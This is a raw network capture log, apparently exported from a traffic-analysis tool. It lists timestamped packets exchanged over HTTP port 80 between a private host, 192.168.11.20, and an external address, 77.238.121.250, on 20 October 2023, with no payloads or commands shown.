                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.592190027 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.592231035 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.592271090 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.592286110 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.592340946 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.592438936 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.592488050 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.592538118 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.592641115 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.592770100 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.592823982 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.598153114 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.598232031 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.598288059 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.598321915 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.598345041 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.598408937 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.598526955 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.600805044 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.600879908 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.600934982 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.600989103 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.601000071 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.601042986 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.601048946 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.601098061 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.601111889 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.601150990 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.601203918 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.601202965 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.601258993 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.601267099 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.601402998 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.601414919 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.601428032 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.601490021 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.601516962 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.601520061 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.601524115 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.601567030 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.601597071 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.601623058 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.601672888 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.601677895 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.601732016 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.601736069 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.601785898 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.601829052 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.601839066 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.601893902 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.601903915 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.601947069 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.602001905 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.602062941 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.602114916 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.602139950 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.602196932 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.602205038 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.602251053 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.602304935 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.602308989 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.602359056 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.602412939 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.602463007 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.602572918 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.985537052 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.985636950 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.985704899 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.985745907 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.985771894 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.985829115 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.985841036 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.985893011 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.985905886 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.985969067 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.986032009 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.986037016 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.986097097 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.986095905 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.986157894 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.986160994 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.986224890 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.986285925 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.986347914 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.986354113 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.986413002 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.986474991 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.986515045 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.986515045 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.986536980 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.986690998 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.986690998 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.991386890 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.991472960 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.991539001 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.991583109 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.991600990 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.991643906 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.991667032 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.991730928 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.991766930 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.991792917 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.991830111 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.991956949 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.992012978 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.992115974 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.995121956 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.995208025 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.995271921 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.995300055 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.995336056 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.995392084 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.995398998 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.995452881 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.995461941 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.995506048 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.995526075 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.995588064 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.995644093 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.995650053 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.995820045 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.995820045 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.996479988 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.996562958 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.996630907 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.996639967 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.996793985 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.996809006 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.996877909 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.996942043 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.997019053 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.997114897 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.997114897 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.997149944 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.997215986 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.997335911 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.997426033 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.997432947 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.997484922 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.997538090 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.997592926 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.997623920 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.997731924 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.997786999 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.997791052 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.997842073 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.997878075 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.997895956 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.997948885 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.998006105 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.998120070 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.998173952 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.998204947 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.998228073 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.998272896 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.998328924 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.998402119 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.998589993 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.998650074 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.998722076 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.998779058 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.998831987 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.998886108 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.998894930 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.998958111 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.999021053 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.999057055 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.999078035 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.999131918 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.999238014 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.999248028 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.999320984 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.999342918 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.999397993 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.999417067 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.999452114 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.999511957 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.999623060 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.999660015 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.999679089 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.999733925 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.999787092 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.999797106 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.999840975 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.999852896 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:12.999944925 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.000000000 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.000063896 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.000089884 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.000117064 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.000145912 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.000178099 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.000200033 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.000252962 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.000307083 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.000324965 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.000328064 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.000343084 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.000449896 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.000509977 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.380392075 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.380482912 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.380549908 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.380610943 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.380630016 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.380630970 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.380685091 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.380750895 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.380767107 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.380814075 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.380820036 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.380877972 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.380939007 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.380970001 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.380970001 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.381000996 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.381061077 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.381066084 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.381118059 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.381129026 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.381191969 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.381241083 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.381253958 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.381290913 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.381316900 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.381360054 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.381378889 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.381441116 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.381488085 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.381567955 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.381628036 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.381628036 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.381692886 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.381779909 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.381901026 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.381908894 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.381967068 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.382029057 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.382050991 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.382093906 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.382154942 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.382215977 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.382260084 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.382261038 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.382277012 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.382337093 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.382396936 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.382447004 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.382458925 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.382522106 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.382540941 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.382586002 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.382591009 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.382647038 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.382682085 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.382709980 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.382759094 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.382877111 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.385163069 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.385247946 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.385313988 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.385356903 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.385432959 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.385435104 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.385499954 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.385535002 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.385561943 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.385624886 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.385698080 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.385755062 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.385785103 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.385818005 CEST5003080192.168.11.2077.238.121.250
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.385910034 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.385976076 CEST805003077.238.121.250192.168.11.20
                                                                                                                                                                                                                        Oct 20, 2023 17:44:13.386012077 CEST5003080192.168.11.2077.238.121.250
